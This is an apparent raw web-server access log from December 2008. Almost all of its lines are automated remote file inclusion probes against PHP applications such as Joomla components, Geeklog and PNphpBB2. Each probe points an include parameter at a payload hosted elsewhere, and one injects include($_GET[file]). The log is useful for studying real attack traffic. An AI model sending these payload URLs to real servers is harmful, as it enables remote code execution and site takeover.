82.102.10.26 - - [08/Dec/2008:09:04:43 -0800] "GET /logs/access_080929.log//contenido/external/frontend/news.php?cfg[path][includes]=http://psdengkil.gov.my//lib/.../idscan8?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
202.125.46.108 - - [08/Dec/2008:09:05:06 -0800] "GET /logs/access_081027.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://en.gov.ua/downloads/plans/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
202.125.46.108 - - [08/Dec/2008:09:05:17 -0800] "GET /logs/access_081107.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://en.gov.ua/downloads/plans/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
80.190.200.18 - - [08/Dec/2008:09:05:34 -0800] "GET /logs//com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://xaoss.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.190.200.18 - - [08/Dec/2008:09:05:35 -0800] "GET /com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://xaoss.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.190.200.18 - - [08/Dec/2008:09:05:35 -0800] "GET /logs//com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://xaoss.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.190.200.18 - - [08/Dec/2008:09:05:36 -0800] "GET /com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://xaoss.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
63.247.65.114 - - [08/Dec/2008:09:05:54 -0800] "GET /logs/access_071227.log//plugins/spamx/MassDelete.Admin.class.php//geeklog//plugins/spamx/BaseAdmin.class.php?_CONF[path]=http://www.geocities.com/kebrok_joss/new.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
63.247.65.114 - - [08/Dec/2008:09:05:54 -0800] "GET /logs//plugins/spamx/MassDelete.Admin.class.php//geeklog//plugins/spamx/BaseAdmin.class.php?_CONF[path]=http://www.geocities.com/kebrok_joss/new.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
63.148.24.80 - - [08/Dec/2008:09:06:12 -0800] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.geocities.com/u.piel/header.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
63.148.24.80 - - [08/Dec/2008:09:06:12 -0800] "GET /components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.geocities.com/u.piel/header.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
77.221.130.2 - - [08/Dec/2008:09:06:19 -0800] "GET /logs/access_080912.log%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://ronniann.com//assets/galleries/readme.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
63.247.65.114 - - [08/Dec/2008:09:06:33 -0800] "GET /logs/access_080101.log//plugins/spamx/MassDelete.Admin.class.php//geeklog//plugins/spamx/BaseAdmin.class.php?_CONF[path]=http://www.geocities.com/kebrok_joss/new.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
87.233.172.64 - - [08/Dec/2008:09:06:34 -0800] "GET /xGB.php?act=admin&do=http://sfunion.com/echot/data/action/act.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.233.172.64 - - [08/Dec/2008:09:06:52 -0800] "GET /logs/access_080424.log//xGB.php?act=admin&do=http://sfunion.com/echot/data/action/act.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
87.233.172.64 - - [08/Dec/2008:09:06:52 -0800] "GET /xGB.php?act=admin&do=http://sfunion.com/echot/data/action/act.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
74.53.70.114 - - [08/Dec/2008:09:06:58 -0800] "GET /logs/scripts.log//tools/send_reminders.php?noSet=0&includedir=http://www.irelandsno1.ie/assets/images/themes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.53.70.114 - - [08/Dec/2008:09:06:58 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.irelandsno1.ie/assets/images/themes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.53.70.114 - - [08/Dec/2008:09:06:59 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.irelandsno1.ie/assets/images/themes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
89.234.63.107 - - [08/Dec/2008:09:07:15 -0800] "GET /classes/Auth/OpenID/Association.php?_ENV[asicms][path]=http://emodrago.t35.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.234.63.107 - - [08/Dec/2008:09:07:15 -0800] "GET /logs/access_081114.log//classes/Auth/OpenID/Association.php?_ENV[asicms][path]=http://emodrago.t35.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.234.63.107 - - [08/Dec/2008:09:07:16 -0800] "GET /logs//classes/Auth/OpenID/Association.php?_ENV[asicms][path]=http://emodrago.t35.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
81.229.72.8 - - [08/Dec/2008:09:07:18 -0800] "GET /logs/access_080507.log//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://forum.jj-nds-br.de/fellid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.dmulk.com"
81.229.72.8 - - [08/Dec/2008:09:07:18 -0800] "GET /logs//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://forum.jj-nds-br.de/fellid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.dmulk.com"
81.229.72.8 - - [08/Dec/2008:09:07:19 -0800] "GET /logs/access_080705.log//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://forum.jj-nds-br.de/fellid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.dmulk.com"
89.234.63.107 - - [08/Dec/2008:09:07:20 -0800] "GET /logs/access_081008.log//classes/Auth/OpenID/Association.php?_ENV[asicms][path]=http://emodrago.t35.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
81.229.72.8 - - [08/Dec/2008:09:07:22 -0800] "GET /index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://forum.jj-nds-br.de/fellid.txt?? HTTP/1.1" 200 3711 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.dmulk.com"
75.125.151.18 - - [08/Dec/2008:09:07:49 -0800] "GET /logs/access_080228.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://josipanicic.freelinuxhost.com/jembut/index/idfe.txt?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
61.19.42.210 - - [08/Dec/2008:09:07:49 -0800] "GET /logs/joomla/index.php?option=com_restaurante&task=http://tom.ucoz.es/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
61.19.42.210 - - [08/Dec/2008:09:07:50 -0800] "GET /joomla/index.php?option=com_restaurante&task=http://tom.ucoz.es/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.229.72.8 - - [08/Dec/2008:09:08:15 -0800] "GET /logs/access_080915.log//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://forum.jj-nds-br.de/fellid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.dmulk.com"
87.233.172.64 - - [08/Dec/2008:09:08:17 -0800] "GET /logs/access_080424.log//xGB.php?act=admin&do=http://sfunion.com/echot/data/action/act.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.233.172.64 - - [08/Dec/2008:09:08:17 -0800] "GET /xGB.php?act=admin&do=http://sfunion.com/echot/data/action/act.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.233.172.64 - - [08/Dec/2008:09:08:17 -0800] "GET /logs//xGB.php?act=admin&do=http://sfunion.com/echot/data/action/act.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.98.237.208 - - [08/Dec/2008:09:08:43 -0800] "GET /logs/access_080407.log%20%20//templates/mangobery/footer.sample.php?Site_Path=http://jonyrulz.com/c99/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
208.182.249.8 - - [08/Dec/2008:09:08:58 -0800] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://www.geocities.com/tester.target/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.182.249.8 - - [08/Dec/2008:09:08:58 -0800] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.geocities.com/tester.target/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.229.72.8 - - [08/Dec/2008:09:09:14 -0800] "GET /logs/access_080419.log//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://forum.jj-nds-br.de/fellid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.dmulk.com"
72.30.142.233 - - [08/Dec/2008:09:09:14 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
72.232.202.218 - - [08/Dec/2008:09:09:16 -0800] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://djvirgil.nl/modules/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
72.232.202.218 - - [08/Dec/2008:09:09:16 -0800] "GET /doceboCms/class/class.dashboard_cms.php?where_framework=http://djvirgil.nl/modules/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
202.125.46.108 - - [08/Dec/2008:09:09:20 -0800] "GET /logs/access_081120.log//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://en.gov.ua/downloads/plans/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.233.52.18 - - [08/Dec/2008:09:09:24 -0800] "GET /logs/access_081114.log/phphtml.php?htmlclass_path=http://www.inzerce-bazar.eu/foto-inzerce-bazar/pras/redm.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.232.202.218 - - [08/Dec/2008:09:09:41 -0800] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://djvirgil.nl/modules/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
72.232.202.218 - - [08/Dec/2008:09:09:41 -0800] "GET /doceboCms/class/class.dashboard_cms.php?where_framework=http://djvirgil.nl/modules/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
87.233.172.64 - - [08/Dec/2008:09:09:44 -0800] "GET /logs/access_080401.log//xGB.php?act=admin&do=http://sfunion.com/echot/data/action/act.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
202.125.46.108 - - [08/Dec/2008:09:09:48 -0800] "GET /logs/access_081111.log//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://en.gov.ua/downloads/plans/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
77.232.91.201 - - [08/Dec/2008:09:10:05 -0800] "GET /logs/scripts.log//tools/send_reminders.php?noSet=0&includedir=http://www.samilglass.com/images/bajoid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
77.232.91.201 - - [08/Dec/2008:09:10:05 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.samilglass.com/images/bajoid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
77.232.91.201 - - [08/Dec/2008:09:10:06 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.samilglass.com/images/bajoid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.30.142.233 - - [08/Dec/2008:09:10:06 -0800] "GET /?show=slide&pageid=163 HTTP/1.0" 200 145510 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
218.239.45.154 - - [08/Dec/2008:09:10:09 -0800] "GET /logs/access_080714.log//phpAutoVideo/LightTwoOh/sidebar.php?loadpage=http://fctribe.com/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
203.204.230.12 - - [08/Dec/2008:09:10:12 -0800] "GET /logs/access_080507.log/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://excelsior-guild.net/vnc/idscanv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.204.230.12 - - [08/Dec/2008:09:10:13 -0800] "GET /components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://excelsior-guild.net/vnc/idscanv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.204.230.12 - - [08/Dec/2008:09:10:13 -0800] "GET /logs/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://excelsior-guild.net/vnc/idscanv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.239.45.154 - - [08/Dec/2008:09:10:32 -0800] "GET /logs/access_080714.log//phpAutoVideo/LightTwoOh/sidebar.php?loadpage=http://fctribe.com/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
203.204.230.12 - - [08/Dec/2008:09:10:34 -0800] "GET /logs/access_080506.log/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://excelsior-guild.net/vnc/idscanv6.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.125.46.108 - - [08/Dec/2008:09:10:43 -0800] "GET /logs/access_080313.log%20%20/?sourcedir=http://en.gov.ua/downloads/plans/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
202.125.46.108 - - [08/Dec/2008:09:10:43 -0800] "GET /logs/access_080912.log%20%20/?sourcedir=http://en.gov.ua/downloads/plans/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
87.233.172.64 - - [08/Dec/2008:09:11:06 -0800] "GET /logs/access_080401.log//xGB.php?act=admin&do=http://sfunion.com/echot/data/action/act.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.117.233.60 - - [08/Dec/2008:09:11:08 -0800] "GET /weather/hw3.php/hw3.php?daysonly=0).include($_GET[file]).(0&file=http://sfunion.com/echot/data/action/act.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
207.218.234.146 - - [08/Dec/2008:09:11:17 -0800] "GET /logs/access_080903.log///?_zb_path=http://alfa-tur.ru/den/ghost/idoke.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
85.214.47.230 - - [08/Dec/2008:09:11:17 -0800] "GET /logs//?page=http://neu_2.lasrv-1.de/web/.v6/id.txt???? HTTP/1.1" 200 77030 "-" "libwww-perl/5.803" "www.dmulk.com"
207.218.234.146 - - [08/Dec/2008:09:11:17 -0800] "GET /logs/access_080903.log///?_zb_path=http://alfa-tur.ru/den/ghost/idoke.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.218.234.146 - - [08/Dec/2008:09:11:18 -0800] "GET //?_zb_path=http://alfa-tur.ru/den/ghost/idoke.txt??? HTTP/1.1" 200 94707 "-" "libwww-perl/5.810" "www.dmulk.com"
207.218.234.146 - - [08/Dec/2008:09:11:19 -0800] "GET //?_zb_path=http://alfa-tur.ru/den/ghost/idoke.txt??? HTTP/1.1" 200 94691 "-" "libwww-perl/5.810" "www.dmulk.com"
85.214.47.230 - - [08/Dec/2008:09:11:19 -0800] "GET /?page=http://neu_2.lasrv-1.de/web/.v6/id.txt???? HTTP/1.1" 200 94694 "-" "libwww-perl/5.803" "www.dmulk.com"
207.218.234.146 - - [08/Dec/2008:09:11:20 -0800] "GET /logs///?_zb_path=http://alfa-tur.ru/den/ghost/idoke.txt??? HTTP/1.1" 200 77031 "-" "libwww-perl/5.810" "www.dmulk.com"
207.218.234.146 - - [08/Dec/2008:09:11:20 -0800] "GET /logs///?_zb_path=http://alfa-tur.ru/den/ghost/idoke.txt??? HTTP/1.1" 200 77031 "-" "libwww-perl/5.810" "www.dmulk.com"
85.214.47.230 - - [08/Dec/2008:09:11:21 -0800] "GET /logs//?page=http://www.geocities.com/kebrok_joss/idq.txt??? HTTP/1.1" 200 77030 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.47.230 - - [08/Dec/2008:09:11:23 -0800] "GET /?page=http://www.geocities.com/kebrok_joss/idq.txt??? HTTP/1.1" 200 94701 "-" "libwww-perl/5.803" "www.dmulk.com"
207.218.234.146 - - [08/Dec/2008:09:11:24 -0800] "GET //?_zb_path=http://alfa-tur.ru/den/ghost/idoke.txt??? HTTP/1.1" 200 94707 "-" "libwww-perl/5.810" "www.dmulk.com"
207.218.234.146 - - [08/Dec/2008:09:11:24 -0800] "GET //?_zb_path=http://alfa-tur.ru/den/ghost/idoke.txt??? HTTP/1.1" 200 94707 "-" "libwww-perl/5.810" "www.dmulk.com"
80.190.200.18 - - [08/Dec/2008:09:12:00 -0800] "GET /logs/phphtml.php?htmlclass_path=http://xaoss.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.190.200.18 - - [08/Dec/2008:09:12:00 -0800] "GET /phphtml.php?htmlclass_path=http://xaoss.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.190.200.18 - - [08/Dec/2008:09:12:02 -0800] "GET /logs/phphtml.php?htmlclass_path=http://xaoss.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.190.200.18 - - [08/Dec/2008:09:12:03 -0800] "GET /phphtml.php?htmlclass_path=http://xaoss.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.30.142.233 - - [08/Dec/2008:09:12:15 -0800] "GET /logs/access_071023.log HTTP/1.0" 200 25506 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
80.238.225.165 - - [08/Dec/2008:09:12:17 -0800] "GET /logs/errors.php?error=http://sunburnultimate.com/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.238.225.165 - - [08/Dec/2008:09:12:20 -0800] "GET /errors.php?error=http://sunburnultimate.com/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
122.201.76.100 - - [08/Dec/2008:09:12:27 -0800] "GET /logs/access_080905.log/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://marista.or.kr/bbs/data/data/id2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
80.238.225.165 - - [08/Dec/2008:09:12:31 -0800] "GET /logs/errors.php?error=http://sunburnultimate.com/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.238.225.165 - - [08/Dec/2008:09:12:32 -0800] "GET /errors.php?error=http://sunburnultimate.com/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.233.172.64 - - [08/Dec/2008:09:12:50 -0800] "GET /logs//xGB.php?act=admin&do=http://sfunion.com/echot/data/action/act.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.233.172.64 - - [08/Dec/2008:09:12:50 -0800] "GET /xGB.php?act=admin&do=http://sfunion.com/echot/data/action/act.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.78.216.197 - - [08/Dec/2008:09:12:50 -0800] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.820" "www.dmulk.com"
87.233.172.64 - - [08/Dec/2008:09:12:50 -0800] "GET /logs//xGB.php?act=admin&do=http://sfunion.com/echot/data/action/act.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.233.172.64 - - [08/Dec/2008:09:12:51 -0800] "GET /xGB.php?act=admin&do=http://sfunion.com/echot/data/action/act.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.78.216.197 - - [08/Dec/2008:09:12:51 -0800] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.820" "www.dmulk.com"
72.30.142.233 - - [08/Dec/2008:09:13:28 -0800] "GET /bikes/dteel/2008_10_24/?N=D HTTP/1.0" 200 1680 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
66.135.32.79 - - [08/Dec/2008:09:13:31 -0800] "GET /logs/scripts.log//tools/send_reminders.php?noSet=0&includedir=http://www.cbfportugal.com/modules/xt_conteudo/safe.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
66.135.32.79 - - [08/Dec/2008:09:13:31 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.cbfportugal.com/modules/xt_conteudo/safe.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
202.64.130.106 - - [08/Dec/2008:09:13:31 -0800] "GET /logs/scripts.log//tools/send_reminders.php?noSet=0&includedir=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.64.130.106 - - [08/Dec/2008:09:13:31 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.64.130.106 - - [08/Dec/2008:09:13:31 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.135.32.79 - - [08/Dec/2008:09:13:31 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.cbfportugal.com/modules/xt_conteudo/safe.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
202.64.130.106 - - [08/Dec/2008:09:13:40 -0800] "GET /logs/scripts.log//tools/send_reminders.php?noSet=0&includedir=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.64.130.106 - - [08/Dec/2008:09:13:41 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.64.130.106 - - [08/Dec/2008:09:13:41 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.64.130.106 - - [08/Dec/2008:09:13:47 -0800] "GET /logs/scripts.log//tools/send_reminders.php?noSet=0&includedir=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.64.130.106 - - [08/Dec/2008:09:13:47 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.64.130.106 - - [08/Dec/2008:09:13:47 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
207.218.234.146 - - [08/Dec/2008:09:13:56 -0800] "GET /logs/access_081005.log///?_zb_path=http://alfa-tur.ru/den/ghost/idoke.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.218.234.146 - - [08/Dec/2008:09:13:58 -0800] "GET /logs/access_081005.log///?_zb_path=http://alfa-tur.ru/den/ghost/idoke.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
122.201.76.100 - - [08/Dec/2008:09:14:31 -0800] "GET /logs/scripts.log//tools/send_reminders.php?noSet=0&includedir=http://forum.jj-nds-br.de/fellid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
122.201.76.100 - - [08/Dec/2008:09:14:31 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://forum.jj-nds-br.de/fellid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
122.201.76.100 - - [08/Dec/2008:09:14:31 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://forum.jj-nds-br.de/fellid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
122.201.76.100 - - [08/Dec/2008:09:14:41 -0800] "GET /logs/access.log/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://marista.or.kr/bbs/data/data/id2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
122.201.76.100 - - [08/Dec/2008:09:14:44 -0800] "GET /logs/scripts.log//tools/send_reminders.php?noSet=0&includedir=http://forum.jj-nds-br.de/fellid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
122.201.76.100 - - [08/Dec/2008:09:14:44 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://forum.jj-nds-br.de/fellid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
122.201.76.100 - - [08/Dec/2008:09:14:44 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://forum.jj-nds-br.de/fellid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
194.117.233.60 - - [08/Dec/2008:09:14:46 -0800] "GET /logs/access_081117.log//weather/hw3.php/hw3.php?daysonly=0).include($_GET[file]).(0&file=http://sfunion.com/echot/data/action/act.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
